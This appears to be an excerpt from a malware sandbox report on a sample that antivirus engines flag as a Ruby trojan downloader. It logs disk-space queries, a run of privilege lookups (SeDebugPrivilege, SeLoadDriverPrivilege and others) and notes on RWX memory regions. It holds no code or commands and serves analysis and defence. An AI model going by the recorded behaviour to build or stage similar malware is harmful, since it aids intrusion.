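Run against the full section, the same classifier turns roughly twenty near-identical blocks into a short list: a handful of single-page RWX re-protections inside the DLL range, two multi-megabyte RWX reservations, and two RWX commits flagged as heap. That summary is what an analyst compares against the staged loader behaviour the Suricata and antivirus verdicts already point to.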
Time & API Arguments Status Return Repeated

GetDiskFreeSpaceExW

total_number_of_free_bytes: 10935271424
free_bytes_available: 10935271424
root_path: C:\
total_number_of_bytes: 34252779520
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 2669744
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceExW

total_number_of_free_bytes: 10935271424
free_bytes_available: 10935271424
root_path: C:\
total_number_of_bytes: 34252779520
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 2669744
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: C:\
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceExW

total_number_of_free_bytes: 10934329344
free_bytes_available: 10934329344
root_path: C:\
total_number_of_bytes: 34252779520
1 1 0
Antivirus Signature
Lionic Trojan.Ruby.Agent.a!c
Kaspersky Trojan-Downloader.Ruby.Agent.b
DrWeb Ruby.Downloader.2
McAfee RDN/Generic Downloader.x
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeShutdownPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeCreateTokenPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeAssignPrimaryTokenPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeMachineAccountPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeTcbPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeSecurityPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeTakeOwnershipPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeLoadDriverPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeBackupPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeRestorePrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeShutdownPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeRemoteShutdownPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeEnableDelegationPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeManageVolumePrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeCreateGlobalPrivilege
1 1 0